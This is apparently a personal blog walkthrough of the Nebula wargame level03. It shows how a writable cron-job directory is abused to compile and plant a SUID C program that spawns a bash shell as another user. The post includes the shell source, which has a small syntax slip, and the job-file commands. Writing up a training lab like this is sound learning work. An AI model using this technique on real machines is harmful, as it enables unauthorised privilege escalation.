Nebula – level03

There is no code to exploit in this challenge but we have to exploit a cron job which runs after each couple of minutes. There is a crontab in writable.d and a script writable.sh in the /home/flag03

writable.sh

for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done

We have to make a C/C++ program which will SUID enabled.

I used the code from the level02

shell.c

int main()
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

system(“/bin/bash”
return 0;
}

I tried to save it in /home/flag03, but i didn’t had enough permission :/
But i have the permission to make a file inside writable.d..Then i copied the output file of the above program into writable.d/ and waited for few minutes. But that didn’t also work :/

Finally i succeeded in this step. I made an executable shell script inside writable.sh which will compile the above given code and put the output file in /home/flag03 which is suid bit set.

$ vim writable.d/job1

gcc /tmp/shell.c -o /home/flag03/shell
chmod +s /home/flag03/shell
chmod +x job1

I waited for few minutes and after that an executable file named shell with suid set file appeared in /home/flag03/
I didn’t waste much time. I executed the shell file and got flag03 shell \m/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s